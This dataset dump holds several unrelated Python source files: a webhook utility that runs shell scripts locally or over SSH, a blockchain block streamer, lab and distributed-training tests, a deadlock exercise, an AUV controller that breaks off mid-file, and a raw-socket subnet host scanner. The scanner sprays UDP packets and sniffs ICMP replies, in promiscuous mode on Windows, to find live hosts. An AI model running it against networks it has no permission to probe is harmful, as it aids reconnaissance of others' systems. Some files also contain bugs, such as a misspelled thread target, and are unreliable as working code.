source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
utils.py
|
# -*- coding: utf-8 -*-
'''
Created on Mar 3, 2017
@author: hustcc
'''
from functools import wraps
from threading import Thread
import json
import click
import datetime
import copy
#from webhookit import app
import webhookit
try:
unicode # noqa
except NameError:
# py3
the_unicode = str # noqa
else: # noqa
# py2
the_unicode = unicode # noqa
def standard_response(success, data):
'''standard response
'''
rst = {}
rst['success'] = success
rst['data'] = data
return json.dumps(rst)
def async(f):
@wraps(f)
def wrapper(*args, **kwargs):
thr = Thread(target=f, args=args, kwargs=kwargs)
thr.setDaemon(True)
thr.start()
return wrapper
# log
def log(t):
msg = '%s: %s' % (current_date(), t)
app.WSHandler.push_msg({'type': 'log', 'msg': msg})
click.echo(msg)
def current_date():
return datetime.datetime.now().strftime("%y-%m-%d %H:%M:%S.%f")
def filter_server(server):
server = copy.deepcopy(server)
if is_remote_server(server):
server['HOST'] = '***.**.**.**'
server['PORT'] = '****'
server['USER'] = '*******'
server['PWD'] = '*******'
return server
# 过滤服务器配置信息的敏感信息
def filter_sensitive(config):
fconfig = {}
for k, v in config.items():
fconfig[k] = []
for server in v:
fconfig[k].append(filter_server(server))
return fconfig
# if host port user pwd all is not empty, then it is a remote server.
def is_remote_server(s):
# all is not empty or zero, then remote server
return all([s.get('HOST', None),
s.get('PORT', None),
s.get('USER', None),
s.get('PWD', None)])
# ssh to exec cmd
def do_ssh_cmd(ip, port, account, pkey, shell, push_data='', timeout=300):
import paramiko
import StringIO
def is_msg_success(msg):
for x in ['fatal', 'fail', 'error']:
if msg.startswith(x) or msg.endswith(x):
return False
return True
try:
port = int(port)
except:
port = 22
s = paramiko.SSHClient()
s.load_system_host_keys()
s.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
# 首先以 ssh 密钥方式登陆
pkey_file = StringIO.StringIO(pkey.strip() + '\n') # 注意最后有一个换行
private_key = paramiko.RSAKey.from_private_key(pkey_file)
s.connect(ip, port, account, pkey=private_key, timeout=10)
pkey_file.close()
except:
# 如果出现异常,则使用 用户密码登陆的方式
s.connect(ip, port, account, password=pkey, timeout=10)
# if push_data:
# shell = shell + (" '%s'" % push_data)
shell = shell.split('\n')
shell = [sh for sh in shell if sh.strip()]
shell = ' && '.join(shell)
stdin, stdout, stderr = s.exec_command(shell, timeout=timeout)
msg = stdout.read()
err = stderr.read()
success = True
if not msg and err:
success = False
msg = err
s.close()
if success:
success = is_msg_success(msg)
return (success, msg)
# 使用线程来异步执行
@async
def do_webhook_shell(server, data):
log('Start to process server: %s' % json.dumps(filter_server(server)))
script = server.get('SCRIPT', '')
if script:
if is_remote_server(server):
# ip, port, account, pkey, shell, push_data='', timeout=300
log('Start to execute remote SSH command. %s' % script)
(success, msg) = do_ssh_cmd(server.get('HOST', None),
server.get('PORT', 0),
server.get('USER', None),
server.get('PWD', None),
server.get('SCRIPT', ''),
data)
else:
log('Start to execute local command. %s' % script)
import commands
# local
(success, msg) = commands.getstatusoutput(server.get('SCRIPT', ''))
success = success > 0 and False or True
else:
success = False
msg = 'There is no SCRIPT configured.'
# end exec, log data
msg = the_unicode(msg, errors='ignore') or ''
msg = msg.strip()
msg = msg.replace('\n', ' ')
log('Completed execute: (%s, %s)' % (success, msg))
return True
|
blocks.py
|
import os
import time
from concurrent.futures import ThreadPoolExecutor, as_completed
from datetime import datetime, timedelta
from threading import Thread
from hive_plug_play.engine.processor import BlockProcessor
from hive_plug_play.hive.server_requests import make_request
from hive_plug_play.utils.tools import UTC_TIMESTAMP_FORMAT
from hive_plug_play.server.system_status import SystemStatus
BATCH_SIZE = 1000
IRREVERSIBLE_GAP = 20
BLOCK_TIME_SECS = 3
class BlockStream:
def __init__(self, start_block):
self._start_block = start_block
self._dynamic_global_props = {}
self._buffer = {}
self._cache = {}
self._hive_head_block = None
self._prev_hash = None
Thread(target=self._start_stream).start()
def _fetch_dynamic_global_props(self):
props = make_request("condenser_api.get_dynamic_global_properties")
self._hive_head_block = props['head_block_number']
self._hive_block_time = datetime.strptime(props['time'], UTC_TIMESTAMP_FORMAT)
self._irreversible_block = props['last_irreversible_block_num']
def _fetch_block(self, block_num):
while True:
resp = make_request("block_api.get_block", {"block_num": block_num})
if 'block' not in resp: continue
block = resp['block']
return [block_num, block]
def _is_valid_block(self, num, block):
if not self._prev_hash: return True # skip check for first block to be processed
match = block['previous'] == self._prev_hash
if match:
return True
else:
print(f"Invalid block detected: {num}")
return False
def _fetch_multiple_blocks(self, start, end):
"""Retrieves blocks from `start` to `end`, inclusive."""
print(f"\nFetching blocks: {start} to {end}")
while True:
upper = start + BATCH_SIZE if (end-start) > BATCH_SIZE else end
blocks_expected = range(start, upper+1)
timer_start = datetime.utcnow()
with ThreadPoolExecutor(max_workers=60) as executor:
futures = (executor.submit(self._fetch_block, block_num) for block_num in blocks_expected)
for future in as_completed(futures):
res = future.result()
self._add_block_to_cache(res[0], res[1])
timer_end = datetime.utcnow()
remaining = end - upper
timer_remaining = (((timer_end - timer_start).seconds)/ BATCH_SIZE) * remaining
print(f"Remaining: {remaining} blocks | {str(timedelta(seconds=timer_remaining))}", end='\r')
if remaining == 0: break
start = upper
def _add_block_to_cache(self, num, block):
self._cache[num] = block
def _wait_for_block(self, block_num):
while True:
self._fetch_dynamic_global_props()
gap = self._hive_head_block - self._start_block
if gap >= 0:
return
else:
delay = abs(gap) * BLOCK_TIME_SECS
print(f"Waiting for {delay} secs")
time.sleep(delay)
def is_behind_schedule(self):
current_time = datetime.utcnow()
if self._latest_block_time + timedelta(seconds=(BLOCK_TIME_SECS*11)) < current_time:
return True
else:
return False
def _prune_block(self, block_num):
del self._cache[block_num]
def _start_stream(self):
self._fetch_dynamic_global_props()
gap = self._hive_head_block - self._start_block
if gap < 0:
# a future block, wait
self._wait_for_block(self._start_block)
gap = self._hive_head_block - self._start_block
print(f"DB is {gap} blocks behind.")
Thread(target=self._feeder).start()
self._fetch_multiple_blocks(self._start_block, self._hive_head_block)
print("\nInitial blocks fetch complete.\n")
time.sleep(5)
Thread(target=self._streamer).start()
def _streamer(self):
# start the stream
while True:
current_time = datetime.utcnow()
if current_time > self._latest_block_time + timedelta(seconds=(BLOCK_TIME_SECS*10)):
next_block = self._latest_block + 1
block = self._fetch_block(next_block)
self._add_block_to_cache(next_block, block[1])
SystemStatus.set_sync_status(
self._latest_block,
self._latest_block_time,
self.is_behind_schedule()
)
if (self._latest_block_time + timedelta(seconds=(BLOCK_TIME_SECS*20))) < current_time:
# catchup if behind
self._fetch_dynamic_global_props()
self._fetch_multiple_blocks(
(self._latest_block + 1),
(self._hive_head_block)
)
time.sleep(0.3)
def _feeder(self):
block_to_push = self._start_block
while True:
while block_to_push not in self._cache:
time.sleep(0.1)
# check before pushing
block = self._cache[block_to_push]
if self._is_valid_block(block_to_push, block):
self._prev_hash = block['block_id']
else:
print("Invalid block detected.")
os._exit(1) # TODO: replace with standby
BlockProcessor.process_block(block_to_push, self._cache[block_to_push])
self._latest_block = block_to_push
self._latest_block_time = datetime.strptime(
block['timestamp'],
UTC_TIMESTAMP_FORMAT
)
SystemStatus.set_sync_status(
self._latest_block,
self._latest_block_time,
self.is_behind_schedule()
)
self._prune_block(block_to_push)
block_to_push += 1
|
test_daq_device.py
|
# Test daq device.
#
# Copyright (C) 2010-2012 Huang Xin
#
# See LICENSE.TXT that came with this file.
import time
import Pyro.core
import threading
import Queue
from SpikeRecord.Plexon.PlexClient import PlexClient
from SpikeRecord.Plexon.PlexUtil import PlexUtil
from Experimenter.Experiments.Experiment import ExperimentConfig,Experiment
class SoftTriggerReceiver(Pyro.core.ObjBase):
""" Trigger stamps receiver
"""
def __init__(self,host,port):
Pyro.core.ObjBase.__init__(self)
self.server_host = host
self.disp_queue = Queue.Queue()
self.comp_queue = Queue.Queue()
threading.Thread(target=self.create_pyro_server,kwargs={'host':host,'port':port}).start()
def put_stamp(self, value):
self.disp_queue.put_nowait(value)
self.comp_queue.put_nowait(value)
def get_comp_stamp(self):
return self.comp_queue.get(timeout=3.0)
def get_all_stamps(self):
stamp_list = []
try:
while True:
stamp_list.append(self.disp_queue.get_nowait())
except:
pass
return stamp_list
def create_pyro_server(self,host,port):
Pyro.config.PYRO_MULTITHREADED = 0
Pyro.core.initServer()
self.pyro_daemon = Pyro.core.Daemon(host=host,port=port)
self.PYRO_URI = self.pyro_daemon.connect(self, 'trigger_receiver')
if self.pyro_daemon.port is not port:
raise RuntimeError("Pyro daemon cannot run on port %d. " %port +
"Probably the port has already been taken up by another pyro daemon.")
self.pyro_daemon.requestLoop()
class TestDAQTriggerExp(Experiment):
""" Test DAQ device experiment.
"""
def __init__(self,receiver_host,receiver_port,params,*args,**kwargs):
super(TestDAQTriggerExp, self).__init__(*args,**kwargs)
self.source = 'sparsenoise_test_daq.py'
self.exp_name = ExperimentConfig.CELLPREFIX + '-daq-test'
self.receiver_host = receiver_host
self.receiver_port = receiver_port
self.params = params
self.assignments = ["trigger_receiver_host = '%s'" %self.receiver_host,
"trigger_receiver_port = %d" %self.receiver_port ]
self.pc = PlexClient()
self.pc.InitClient()
self.pu = PlexUtil()
def run(self):
super(TestDAQTriggerExp, self).run()
self.run_stimulus(left_params=self.params, assignments=self.assignments)
self.test(mode="strobed")
def test(self, mode="strobed"):
""" Stimulus will run on StimServer with a regular stamp controller posting
stamps via DAQ device and a soft stamp controller writting stamps to a
trigger receiver running at receiver host. The sweep stamps of both controllers
are the same. And a PlexClient is started to collect stamps sent by DAQ device.
In the meantime, a pyro server is started to receive stamps send by soft stamp
controller. And the stamps are compared between two receivers to see if the
stamps are pairly identical.
"""
trig_receiver = SoftTriggerReceiver(host=self.receiver_host,port=self.receiver_port)
DAQ_nstamps = 0
Soft_nstamps = 0
failed_times = 0
finished = False
while not finished:
data = self.pc.GetTimeStampArrays()
if mode == "strobed":
daq_stamps = self.pu.GetExtEvents(data, event='first_strobe_word')
elif mode == "unstrobed":
daq_stamps = self.pu.GetExtEvents(data, event='unstrobed_word')
DAQ_nstamps += len(daq_stamps['value'])
daq_words_str = ','.join(str(stamp) for stamp in daq_stamps['value'])
soft_stamps = trig_receiver.get_all_stamps()
Soft_nstamps += len(soft_stamps)
soft_words_str = ','.join(str(stamp) for stamp in soft_stamps)
with open("test_daq_device.txt",'a') as self.output:
if len(daq_words_str) > 0:
self._log_test("Found daq trigger words: %s" %daq_words_str)
if len(soft_words_str) > 0:
self._log_test("Found soft trigger words: %s" %soft_words_str)
for index,(value,timestamp) in enumerate(zip(daq_stamps['value'],daq_stamps['timestamp'])) :
self._log_test("Stamp index:%d" % index)
self._log_test("Found DAQ stamps:%d, Soft stamps:%d" % (DAQ_nstamps, Soft_nstamps))
self._log_test("found daq trigger word: %d t=%f" % (value,timestamp))
try:
soft_stamp = trig_receiver.get_comp_stamp()
except:
self._log_test("found no soft trigger word")
break
self._log_test("found soft trigger word: %d" %soft_stamp)
try:
assert value == soft_stamp
except:
failed_times += 1
self._log_test("Assertion failed:\n\tDAQ stamp:\t%d\t(%s)\tt=%f\n\tSoft stamp:\t%d\t(%s)" \
% (value,bin(value),timestamp,soft_stamp,bin(soft_stamp)))
self._log_test("Assertion failed times:%d\n" % failed_times)
time.sleep(1.0)
def _log_test(self, line):
print(line)
self.output.writelines(line + "\n")
if __name__ == '__main__':
ExperimentConfig(data_base_dir='data_test',stim_server_host='192.168.1.1',new_cell=True)
dummy_exp = Experiment()
p_left = dummy_exp.get_stimulus_params(eye='left')
TestDAQTriggerExp(receiver_host='192.168.1.2',receiver_port=8118,params=p_left).run()
|
deadlock.py
|
import random
import time
import threading
from typing import List
threads: List[threading.Thread] = [None]
lock_map = {}
def go_wait():
# Wait for other threads to initialize
time.sleep(0.25)
# Pick a thread at random
thread = random.choice(
list(filter(lambda k: k != threading.current_thread(), threads)))
# Fill in the `lock map`
lock_map[threading.current_thread()] = thread
if thread is not None:
# Wait for the thread to finish
print(f"[{threading.current_thread().getName()}] Waiting for {thread.getName()}...")
thread.join()
else:
# We picked no thread
print(f"[{threading.current_thread().getName()}] Not waiting on any thread!")
# Announce we're done!
print(f"[{threading.current_thread().getName()}] Done!")
for i in range(5):
thread = threading.Thread(target=go_wait)
threads.append(thread)
thread.start()
# Wait for everything to get started
time.sleep(0.5)
# Two steps to this challenge:
# 1) Use the `lock_map` to detect a deadlock (think about _cycles_)
# 2) Depending on the deadlock(s) you find, kill as few threads as possible to end the deadlock.
# You can kill threads with `thread._stop()`
|
test_nce_remote_table_op.py
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import os
import signal
import time
import unittest
from multiprocessing import Process
import numpy as np
import paddle.fluid as fluid
import paddle.fluid.core as core
from paddle.fluid.op import Operator
from paddle.fluid.framework import Program, program_guard
from dist_test_utils import *
from paddle.fluid.transpiler.distribute_transpiler import DistributedMode
def nce(input, weight, bias, sample_weight, labels, num_classes,
num_sample_class):
samples = []
sample_labels = []
batch_size = input.shape[0]
num_true_class = labels.shape[1]
for i in range(batch_size):
w = 1 if sample_weight is None else sample_weight[i]
for label in labels[i]:
samples.append((i, label, True, w))
sample_labels.append(label)
for num in range(num_sample_class):
samples.append((i, num, False, w))
sample_labels.append(num)
# forward bias
sample_out = np.zeros(len(samples)).astype(np.float32)
if bias is not None:
for i in range(len(samples)):
sample_out[i] = bias[samples[i][1]]
# forward weight
for i in range(len(samples)):
sample_out[i] += np.dot(input[samples[i][0]], weight[samples[i][1]])
# forward activation
sample_out = 1.0 / (1.0 + np.exp(-sample_out))
# forward cost
out = np.zeros(batch_size).astype(np.float32)
b = 1.0 / num_classes * num_sample_class
for i in range(len(samples)):
o = sample_out[i]
cost = -np.log(o / (o + b)) if samples[i][2] else -np.log(b / (o + b))
out[samples[i][0]] += cost * samples[i][3]
return (out[:, np.newaxis], np.array(sample_out).reshape(
batch_size, num_sample_class + num_true_class),
np.array(sample_labels).reshape(batch_size,
num_sample_class + num_true_class))
def run_pserver(pserver_id, use_cuda, sync_mode):
remove_ps_flag(os.getpid())
scope = fluid.core.Scope()
program = Program()
with fluid.scope_guard(scope):
with program_guard(program, startup_program=Program()):
# create table parameter in scope
place = fluid.CUDAPlace(0) if use_cuda else fluid.CPUPlace()
# create and initialize Param Variable
param = scope.var('table').get_tensor()
param_array = np.ones((5, 8)).astype("float32")
for i in range(len(param_array)):
param_array[i] *= param_array[i] * i + pserver_id * 10 + 1
param.set(param_array, place)
optimize_block = program._create_block(program.global_block().idx)
program.global_block().append_op(
type="listen_and_serv",
inputs={'X': []},
outputs={},
attrs={
"optimize_blocks": [optimize_block],
"endpoint": '127.0.0.1:0',
"Fanin": 1,
"distributed_mode": DistributedMode.SYNC,
"grad_to_block_id": []
})
exe = fluid.Executor(place)
exe.run(program)
class TestListenAndServOp(unittest.TestCase):
def setUp(self):
self.ps_timeout = 5
def _start_pserver(self, pserver_id, use_cuda, sync_mode, pserver_func):
p = Process(target=pserver_func, args=(pserver_id, use_cuda, sync_mode))
p.daemon = True
p.start()
return p
def _wait_ps_ready(self, pid):
start_left_time = self.ps_timeout
sleep_time = 0.5
while True:
assert start_left_time >= 0, "wait ps ready failed"
time.sleep(sleep_time)
try:
# the listen_and_serv_op would touch a file which contains the listen port
# on the /tmp directory until it was ready to process all the RPC call.
os.stat("/tmp/paddle.%d.port" % pid)
return
except os.error:
start_left_time -= sleep_time
def _get_pserver_port(self, pid):
with open("/tmp/paddle.%d.port" % pid, 'r') as f:
port = int(f.read().strip())
return port
def _run_nce_op_two_pserver(self, place, port0, port1):
scope = fluid.core.Scope()
program = Program()
with fluid.scope_guard(scope):
with program_guard(program, startup_program=Program()):
x = scope.var('Input').get_tensor()
x_array = np.random.random((4, 8)).astype("float32")
x.set(x_array, place)
# create and initialize Param Variable
param = scope.var('Weight').get_tensor()
param_array = np.zeros((5, 8)).astype("float32")
param.set(param_array, place)
bias = scope.var('Bias').get_tensor()
bias_array = np.random.random((5, 1)).astype("float32")
bias.set(bias_array, place)
sample_w = scope.var('SampleWeight').get_tensor()
sample_weight = np.random.random((4, 1)).astype("float32")
sample_w.set(sample_weight, place)
label = scope.var('Label').get_tensor()
label_array = np.array([[0], [1], [4], [3]])
label.set(label_array, place)
cost = scope.var('Cost').get_tensor()
cost_w = np.zeros((4, 1)).astype("float32")
cost.set(cost_w, place)
sample_l = scope.var('SampleLogits').get_tensor()
sample_l_w = np.zeros((4, 3)).astype("float32")
sample_l.set(sample_l_w, place)
sample_la = scope.var('SampleLabels').get_tensor()
sample_la_w = np.zeros((4, 3)).astype("int")
sample_la.set(sample_la_w, place)
emaps = ['127.0.0.1:' + str(port0), '127.0.0.1:' + str(port1)]
table_names = ['table', 'table']
height_sections = [2, 3]
# create and run nce operator
nce_op = Operator(
"nce",
Input='Input',
Weight='Weight',
Label='Label',
Bias='Bias',
Cost='Cost',
SampleLogits='SampleLogits',
SampleLabels='SampleLabels',
SampleWeight='SampleWeight',
num_total_classes=5,
num_neg_samples=2,
custom_neg_classes=list(range(2)),
sampler=0,
seed=0,
is_sparse=True,
remote_prefetch=True,
epmap=emaps,
table_names=table_names,
height_sections=height_sections)
nce_op.run(scope, place)
# get and compare result
o_cost = np.array(scope.var('Cost').get_tensor())
o_logits = np.array(scope.var('SampleLogits').get_tensor())
o_labels = np.array(scope.var('SampleLabels').get_tensor())
param_array = np.ones((5, 8)).astype("float32")
for i in range(2):
param_array[i] *= param_array[i] * i + 0 * 10 + 1
for i in range(2, 5):
param_array[i] *= param_array[i] * i + 1 * 10 + 1
out = nce(x_array, param_array, bias_array, sample_weight,
label_array, 5, 2)
np.testing.assert_almost_equal(o_cost, out[0], decimal=6)
np.testing.assert_almost_equal(o_logits, out[1], decimal=6)
np.testing.assert_almost_equal(o_labels, out[2], decimal=6)
def test_nce_op_remote(self):
os.environ['PADDLE_ENABLE_REMOTE_PREFETCH'] = "1"
# run pserver on CPU in sync mode
p0 = self._start_pserver(0, False, True, run_pserver)
self._wait_ps_ready(p0.pid)
port0 = self._get_pserver_port(p0.pid)
p1 = self._start_pserver(1, False, True, run_pserver)
self._wait_ps_ready(p1.pid)
port1 = self._get_pserver_port(p1.pid)
places = [core.CPUPlace()]
for place in places:
self._run_nce_op_two_pserver(place, port0, port1)
# raise SIGTERM to pserver
os.kill(p0.pid, signal.SIGINT)
p0.join()
os.kill(p1.pid, signal.SIGINT)
p1.join()
if __name__ == '__main__':
unittest.main()
|
scanner.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Jun 23 12:18:41 2020
@author: edoardottt
"""
import socket
import threading
import time
import os
import struct
from netaddr import IPNetwork, IPAddress
from ctypes import *
# host to listen on
host = "192.168.0.180"
# subnet to target
subnet = "192.168.0.0/24"
# magic string we'll check ICMP responses for
magic_message = "PYTHONRULES!"
# this sprays out the UDP datagram
def udp_sender(subnet, magic_message):
time.sleep(5)
sender = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
for ip in IPNetwork(subnet):
try:
sender.sendto(magic_message, ("{}".format(ip, 65212)))
except:
pass
# our IP header
class IP(Structure):
_fields_ = [
("ihl", c_ubyte, 4),
("version", c_ubyte, 4),
("tos", c_ubyte),
("len", c_ushort),
("id", c_ushort),
("offset", c_ushort),
("ttl", c_ubyte),
("protocol_num", c_ubyte),
("sum", c_ushort),
("src", c_uint32),
("dst", c_uint32),
]
def __new__(self, socket_buffer=None):
return self.from_buffer_copy(socket_buffer)
def __init__(self, socket_buffer=None):
# map protocol constants to their names
self.protocol_map = {1: "ICMP", 6: "TCP", 17: "UDP"}
# human readable IP adresses
self.src_address = socket.inet_ntoa(struct.pack("@I", self.src))
self.dst_address = socket.inet_ntoa(struct.pack("@I", self.dst))
# human readable protocol
try:
self.protocol = self.protocol_map[self.protocol_num]
except:
self.protocol = str(self.protocol_num)
# our ICMP header
class ICMP(Structure):
_fields_ = [
("type", c_ubyte),
("code", c_ubyte),
("checksum", c_ushort),
("unused", c_ushort),
("next_hop_mtu", c_ushort),
]
def __new__(self, socket_buffer):
return self.from_buffer_copy(socket_buffer)
def __init(self, socket_buffer):
pass
# check the OS
if os.name == "nt":
socket_protocol = socket.IPPROTO_IP
else:
socket_protocol = socket.IPPROTO_ICMP
sniffer = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket_protocol)
sniffer.bind((host, 0))
sniffer.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
if os.name == "nt":
sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)
# start threading packets
t = threading.Thread(target=upd_sender, args=(subnet, magic_message))
t.start()
try:
while True:
# read in a packet
raw_buffer = sniffer.recvfrom(65565)[0]
# create an IP header from the first 20 bytes of the buffer
ip_header = IP(raw_buffer[:20])
# print out the protocol that was detected and the hosts
print(
"Protocol {} {} -> {}".format(
ip_header.protocol, ip_header.src_address, ip_header.dst_address
)
)
# if it's ICMP, we want it
if ip_header.protocol == "ICMP":
# calculate where our ICMP packet starts
offset = ip_header.ihl * 4
buf = raw_buffer[offset : offset + sizeof(ICMP)]
# create a new ICMP structure
icmp_header = ICMP(buf)
print(
"ICMP -> Type: {} Code: {}".format(icmp_header.type, icmp_header.code)
)
if icmp_header.code == 3 and icmp_header.type == 3:
# make sure host is our target subnet
if IPAddress(ip_header.src_address) in IPNetwork(subnet):
# make sure it has our magic message
if (
raw_buffer[len(raw_buffer) - len(magic_message) :]
== magic_message
):
print("Host Up: {}".format(ip_header.src_address))
# handle CTRL + C
except KeyboardInterrupt:
# if we're using Windows, turn off promiscuous mode
if os.name == "nt":
sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_OFF)
|
auv_geometric_tracking_controller.py
|
#!/usr/bin/env python3
# Copyright (c) 2020 The Plankton Authors.
# All rights reserved.
#
# This source code is derived from UUV Simulator
# (https://github.com/uuvsimulator/uuv_simulator)
# Copyright (c) 2016-2019 The UUV Simulator Authors
# licensed under the Apache license, Version 2.0
# cf. 3rd-party-licenses.txt file in the root directory of this source tree.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from copy import deepcopy
import math
import numpy as np
import traceback
import threading
import rclpy
import tf2_ros
from rclpy.node import Node
import geometry_msgs.msg as geometry_msgs
from nav_msgs.msg import Odometry
import uuv_control_msgs.msg as uuv_control_msgs
from uuv_thrusters.models import Thruster
from uuv_gazebo_ros_plugins_msgs.msg import FloatStamped
from uuv_control_msgs.msg import TrajectoryPoint
from uuv_control_interfaces import DPControllerLocalPlanner
#from tf_quaternion.transformations import quaternion_matrix
from tf_quaternion.transformations import quaternion_multiply
from tf_quaternion.transformations import quaternion_inverse
from tf_quaternion.transformations import euler_from_quaternion
from plankton_utils.param_helper import parse_nested_params_to_dict, \
get_parameter_or_helper
from plankton_utils.time import is_sim_time
from plankton_utils.time import time_in_float_sec
from utils.transform import get_world_ned_to_enu
class AUVGeometricTrackingController(Node):
def __init__(self, name, world_ned_to_enu=None,**kwargs):
super().__init__(name,
allow_undeclared_parameters=True,
automatically_declare_parameters_from_overrides=True,
**kwargs)
# sim_time = rclpy.parameter.Parameter('use_sim_time', rclpy.Parameter.Type.BOOL, True)
# self.set_parameters([sim_time])
self.namespace = self.get_namespace().replace('/', '')
self.get_logger().info('Initialize control for vehicle <%s>' % self.namespace)
self.local_planner = DPControllerLocalPlanner(self, full_dof=True, thrusters_only=False,
stamped_pose_only=False, tf_trans_world_ned_to_enu=world_ned_to_enu)
self.base_link = self.get_parameter_or_helper('base_link', 'base_link').get_parameter_value().string_value
# Reading the minimum thrust generated
self.min_thrust = self.get_parameter_or_helper('min_thrust', 0.0).value
assert self.min_thrust >= 0
self.get_logger().info('Min. thrust [N]=%.2f' % self.min_thrust)
# Reading the maximum thrust generated
self.max_thrust = self.get_parameter_or_helper('max_thrust', 0.0).value
assert self.max_thrust > 0 and self.max_thrust > self.min_thrust
self.get_logger().info('Max. thrust [N]=%.2f' % self.max_thrust)
# Reading the thruster topic
self.thruster_topic = self.get_parameter_or_helper('thruster_topic', 'thrusters/id_0/input').get_parameter_value().string_value
assert len(self.thruster_topic) > 0
# Reading the thruster gain
self.p_gain_thrust = self.get_parameter_or_helper('thrust_p_gain', 0.0).value
assert self.p_gain_thrust > 0
self.d_gain_thrust = self.get_parameter_or_helper('thrust_d_gain', 0.0).value
assert self.d_gain_thrust >= 0
# Reading the roll gain
self.p_roll = self.get_parameter_or_helper('p_roll', 0.0).value
assert self.p_roll > 0
# Reading the pitch P gain
self.p_pitch = self.get_parameter_or_helper('p_pitch', 0.0).value
assert self.p_pitch > 0
# Reading the pitch D gain
self.d_pitch = self.get_parameter_or_helper('d_pitch', 0.0).value
assert self.d_pitch >= 0
# Reading the yaw P gain
self.p_yaw = self.get_parameter_or_helper('p_yaw', 0.0).value
assert self.p_yaw > 0
# Reading the yaw D gain
self.d_yaw = self.get_parameter_or_helper('d_yaw', 0.0).value
assert self.d_yaw >= 0
# Reading the saturation for the desired pitch
self.desired_pitch_limit = self.get_parameter_or_helper('desired_pitch_limit', 15 * np.pi / 180).value
assert self.desired_pitch_limit > 0
# Reading the saturation for yaw error
self.yaw_error_limit = self.get_parameter_or_helper('yaw_error_limit', 1.0).value
assert self.yaw_error_limit > 0
# Reading the number of fins
self.n_fins = self.get_parameter_or_helper('n_fins', 0).get_parameter_value().integer_value
assert self.n_fins > 0
# Reading the mapping for roll commands
self.map_roll = self.get_parameter_or_helper('map_roll', [0, 0, 0, 0]).value
assert isinstance(self.map_roll, list)
assert len(self.map_roll) == self.n_fins
# Reading the mapping for the pitch commands
self.map_pitch = self.get_parameter_or_helper('map_pitch', [0, 0, 0, 0]). value
assert isinstance(self.map_pitch, list)
assert len(self.map_pitch) == self.n_fins
# Reading the mapping for the yaw commands
self.map_yaw = self.get_parameter_or_helper('map_yaw', [0, 0, 0, 0]).value
assert isinstance(self.map_yaw, list)
assert len(self.map_yaw) == self.n_fins
# Retrieve the thruster configuration parameters
self.thruster_config = self.get_parameters_by_prefix('thruster_config')
#Parse parameters to dictionary and unpack params to values
self.thruster_config = parse_nested_params_to_dict(self.thruster_config, '.', True)
# Check if all necessary thruster model parameter are available
thruster_params = ['conversion_fcn_params', 'conversion_fcn',
'topic_prefix', 'topic_suffix', 'frame_base', 'max_thrust']
for p in thruster_params:
if p not in self.thruster_config:
raise RuntimeError(
'Parameter <%s> for thruster conversion function is '
'missing' % p)
# Setting up the thruster topic name
self.thruster_topic = self.build_thruster_topic_name(self.namespace,
self.thruster_config['topic_prefix'], 0,
self.thruster_config['topic_suffix'])
# self.thruster_topic = '/%s/%s/id_%d/%s' % (self.namespace,
# self.thruster_config['topic_prefix'], 0,
# self.thruster_config['topic_suffix'])
self.max_fin_angle = self.get_parameter_or_helper('max_fin_angle', 0.0).value
assert self.max_fin_angle > 0
# Reading the fin input topic prefix
self.fin_topic_prefix = self.get_parameter_or_helper('fin_topic_prefix', 'fins').get_parameter_value().string_value
self.fin_topic_suffix = self.get_parameter_or_helper('fin_topic_suffix', 'input').get_parameter_value().string_value
self.rpy_to_fins = np.vstack((self.map_roll, self.map_pitch, self.map_yaw)).T
self.pub_cmd = list()
self.odometry_sub = None
self.reference_pub = None
self.error_pub = None
self.tf_buffer = tf2_ros.Buffer()
self.listener = tf2_ros.TransformListener(self.tf_buffer, self)
self._ready = False
self.init_future = rclpy.Future()
self.init_thread = threading.Thread(target=self._init_async, daemon=True)
self.init_thread.start()
# =========================================================================
def _init_async(self):
try:
self._init_async_impl()
except Exception as e:
self.get_logger().error('Caught exception: ' + repr(e))
traceback.print_exc()
# =========================================================================
def _init_async_impl(self):
base = '%s/%s' % (self.namespace, self.base_link)
frame = '%s/%s%d' % (self.namespace, self.thruster_config['frame_base'], 0)
self.get_logger().info('Lookup: Thruster transform found %s -> %s' % (base, frame))
trans = self.tf_buffer.lookup_transform(base, frame, rclpy.time.Time(), rclpy.time.Duration(seconds=5))
pos = np.array([trans.transform.translation.x,
trans.transform.translation.y,
trans.transform.translation.z])
quat = np.array([trans.transform.rotation.x,
trans.transform.rotation.y,
trans.transform.rotation.z,
trans.transform.rotation.w])
self.get_logger().info('Thruster transform found %s -> %s' % (base, frame))
self.get_logger().info('pos=' + str(pos))
self.get_logger().info('rot=' + str(quat))
# Read transformation from thruster
# params = {key: val.value for key, val in params.items()}
self.thruster = Thruster.create_thruster(
self,
self.thruster_config['conversion_fcn'], 0,
self.thruster_topic, pos, quat,
**self.thruster_config['conversion_fcn_params'])
self.get_logger().info('Thruster configuration=\n' + str(self.thruster_config))
self.get_logger().info('Thruster input topic=' + self.thruster_topic)
self.pub_cmd = list()
for i in range(self.n_fins):
topic = self.build_fin_topic_name(self.fin_topic_prefix, i, self.fin_topic_suffix)
#topic = '%s/id_%d/%s' % (self.fin_topic_prefix, i, self.fin_topic_suffix)
self.pub_cmd.append(
self.create_publisher(FloatStamped, topic, 10))
self.odometry_sub = self.create_subscription(
Odometry, 'odom', self.odometry_callback, 10)
self.reference_pub = self.create_publisher(
TrajectoryPoint, 'reference', 1)
